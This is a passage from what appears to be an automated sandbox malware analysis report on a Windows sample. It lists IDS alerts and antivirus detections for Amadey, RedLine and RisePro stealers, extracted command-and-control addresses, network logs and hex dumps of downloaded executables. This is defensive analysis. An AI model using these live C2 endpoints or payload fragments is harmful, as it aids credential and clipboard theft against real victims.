                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:34:03.054930
                              SID:2856147
                              Source Port:50734
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:24.139646
                              SID:2046266
                              Source Port:58709
                              Destination Port:49762
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:30:08.961575
                              SID:2856151
                              Source Port:49890
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:24.405929
                              SID:2046267
                              Source Port:58709
                              Destination Port:49762
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:03.820669
                              SID:2856122
                              Source Port:80
                              Destination Port:49713
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:30.283553
                              SID:2046267
                              Source Port:58709
                              Destination Port:49773
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:40.962203
                              SID:2046266
                              Source Port:58709
                              Destination Port:49809
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:30.339002
                              SID:2046267
                              Source Port:58709
                              Destination Port:49774
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:30.018405
                              SID:2046266
                              Source Port:58709
                              Destination Port:49773
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:30.089886
                              SID:2046266
                              Source Port:58709
                              Destination Port:49774
                              Protocol:TCP
                              Classtype:A Network Trojan was detected

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeAvira: detected
                              Antivirus detection for dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeAvira: detection malicious, Label: HEUR/AGEN.1305500
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exeAvira: detection malicious, Label: HEUR/AGEN.1305500
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeAvira: detection malicious, Label: TR/AutoIt.zstul
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dllAvira: detection malicious, Label: TR/PSW.Agent.szlsq
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dllAvira: detection malicious, Label: TR/ClipBanker.tbxxw
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeAvira: detection malicious, Label: HEUR/AGEN.1305500
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dllAvira: detection malicious, Label: TR/PSW.Agent.szlsq
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dllAvira: detection malicious, Label: TR/ClipBanker.pjgxt
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exeAvira: detection malicious, Label: TR/AutoIt.zstul
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Found malware configuration
                              Source: 52.0.build12.exe.3c0000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["b-stamps.gl.at.ply.gg:30946"], "Bot Id": "Traffic"}
                              Source: rundll32.exe.3356.8.memstrminMalware Configuration Extractor: Amadey {"C2 url": ["http://193.233.132.56/Pneh2sXQk0/index.php"]}
                              Multi AV Scanner detection for dropped file
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeVirustotal: Detection: 50%Perma Link
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dllReversingLabs: Detection: 95%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dllVirustotal: Detection: 81%Perma Link
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exeVirustotal: Detection: 32%Perma Link
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exeVirustotal: Detection: 77%Perma Link
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dllReversingLabs: Detection: 81%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dllVirustotal: Detection: 80%Perma Link
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dllReversingLabs: Detection: 91%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dllVirustotal: Detection: 80%Perma Link
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exeVirustotal: Detection: 40%Perma Link
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exeVirustotal: Detection: 50%Perma Link
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exeVirustotal: Detection: 42%Perma Link
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dllReversingLabs: Detection: 71%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dllVirustotal: Detection: 78%Perma Link
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeVirustotal: Detection: 50%Perma Link
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeReversingLabs: Detection: 50%
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeVirustotal: Detection: 54%Perma Link
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeVirustotal: Detection: 42%Perma Link
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeVirustotal: Detection: 32%Perma Link
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeVirustotal: Detection: 50%Perma Link
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeVirustotal: Detection: 77%Perma Link
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeVirustotal: Detection: 77%Perma Link
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeVirustotal: Detection: 42%Perma Link
                              Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dllReversingLabs: Detection: 81%
                              Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dllVirustotal: Detection: 80%Perma Link
                              Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllReversingLabs: Detection: 71%
                              Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllVirustotal: Detection: 78%Perma Link
                              Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllReversingLabs: Detection: 95%
                              Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllVirustotal: Detection: 81%Perma Link
                              Multi AV Scanner detection for submitted file
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeVirustotal: Detection: 54%Perma Link
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeReversingLabs: Detection: 50%
                              Machine Learning detection for dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeJoe Sandbox ML: detected
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeJoe Sandbox ML: detected
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49709 version: TLS 1.0
                              Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49705 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49712 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49766 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49767 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49776 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49777 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49780 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49782 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49801 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49806 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49811 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49813 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49825 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49827 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49840 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49874 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49878 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49923 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49925 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 20.189.173.25:443 -> 192.168.2.5:50555 version: TLS 1.2
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Videos\desktop.iniJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Music\desktop.iniJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.iniJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                              Networking

                              barindex
                              Snort IDS alert for network traffic
                              Source: TrafficSnort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.5:49713 -> 193.233.132.56:80
                              Source: TrafficSnort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 193.233.132.56:80 -> 192.168.2.5:49713
                              Source: TrafficSnort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.5:49717 -> 193.233.132.56:80
                              Source: TrafficSnort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.5:49718 -> 193.233.132.56:80
                              Source: TrafficSnort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49719 -> 193.233.132.56:80
                              Source: TrafficSnort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49721 -> 193.233.132.56:80
                              Source: TrafficSnort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49741 -> 193.233.132.56:80
                              Source: TrafficSnort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.5:49762 -> 147.45.47.93:58709
                              Source: TrafficSnort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49762
                              Source: TrafficSnort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 147.45.47.93:58709 -> 192.168.2.5:49762
                              Source: TrafficSnort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49768 -> 193.233.132.56:80
                              Source: TrafficSnort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49773
                              Source: TrafficSnort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49774
                              Source: TrafficSnort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 147.45.47.93:58709 -> 192.168.2.5:49773
                              Source: TrafficSnort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 147.45.47.93:58709 -> 192.168.2.5:49774
                              Source: TrafficSnort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.5:49762 -> 147.45.47.93:58709
                              Source: TrafficSnort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.5:49773 -> 147.45.47.93:58709
                              Source: TrafficSnort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.5:49774 -> 147.45.47.93:58709
                              Source: TrafficSnort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49809
                              Source: TrafficSnort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49822
                              Source: TrafficSnort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49870
                              Source: TrafficSnort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 193.233.132.167:80 -> 192.168.2.5:49869
                              Source: TrafficSnort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49880 -> 193.233.132.167:80
                              Source: TrafficSnort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49886 -> 193.233.132.167:80
                              Source: TrafficSnort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.5:49890 -> 193.233.132.167:80
                              Source: TrafficSnort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.5:49892 -> 193.233.132.167:80
                              Source: TrafficSnort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49918
                              Source: TrafficSnort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.5:50734 -> 193.233.132.167:80
                              System process connects to network (likely due to code injection or exploit)
                              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 193.233.132.56 80
                              Source: C:\Windows\System32\rundll32.exeNetwork Connect: 193.233.132.167 80
                              C2 URLs / IPs found in malware configuration
                              Source: Malware configuration extractorIPs: 193.233.132.56
                              Source: Malware configuration extractorURLs: b-stamps.gl.at.ply.gg:30946
                              Connects to many ports of the same IP (likely port scanning)
                              Source: global trafficTCP traffic: 147.45.47.93 ports 0,5,7,8,58709,9
                              Source: global trafficTCP traffic: 147.185.221.19 ports 0,3,4,6,9,30946
                              Uses known network protocols on non-standard ports
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49883
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49889
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49883
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49889
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49889
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49883
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49998
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49997
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49998
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49997
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50461 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50461 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50094
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50095
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50094
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50095
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50094
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50095
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50094
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50095
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50094
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50095
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50094
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50461
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50462
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50461
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50462
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50461
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50462
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50784 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50785 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50784 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50785 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50784
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50785
                              Source: global trafficTCP traffic: 192.168.2.5:49762 -> 147.45.47.93:58709
                              Source: global trafficTCP traffic: 192.168.2.5:49883 -> 147.185.221.19:30946
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:03 GMTContent-Type: application/octet-streamContent-Length: 1285632Last-Modified: Sun, 03 Mar 2024 11:54:33 GMTConnection: keep-aliveETag: "65e464f9-139e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 69 12 e4 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:04 GMTContent-Type: application/octet-streamContent-Length: 1905152Last-Modified: Fri, 19 Apr 2024 00:37:12 GMTConnection: keep-aliveETag: "6621bcb8-1d1200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2a 52 e4 13 6e 33 8a 40 6e 33 8a 40 6e 33 8a 40 35 5b 89 41 60 33 8a 40 35 5b 8f 41 f0 33 8a 40 bb 5e 8e 41 7c 33 8a 40 bb 5e 89 41 7a 33 8a 40 bb 5e 8f 41 1b 33 8a 40 35 5b 8e 41 7a 33 8a 40 35 5b 8b 41 7d 33 8a 40 6e 33 8b 40 ba 33 8a 40 f5 5d 83 41 6f 33 8a 40 f5 5d 75 40 6f 33 8a 40 f5 5d 88 41 6f 33 8a 40 52 69 63 68 6e 33 8a 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 15 bf bb 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 dc 04 00 00 aa 01 00 00 00 00 00 00 50 4b 00 00 10 00 00 00 f0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 4b 00 00 04 00 00 4a 61 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 70 06 00 6a 00 00 00 00 60 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 3b 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 3b 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 60 06 00 00 02 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 70 06 00 00 02 00 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 80 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 62 75 70 79 62 6b 65 00 00 1a 00 00 40 31 00 00 fe 19 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 6a 78 71 61 69 64 73 00 10 00 00 00 40 4b 00 00 06 00 00 00 ea 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 4b 00 00 22 00 00 00 f0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 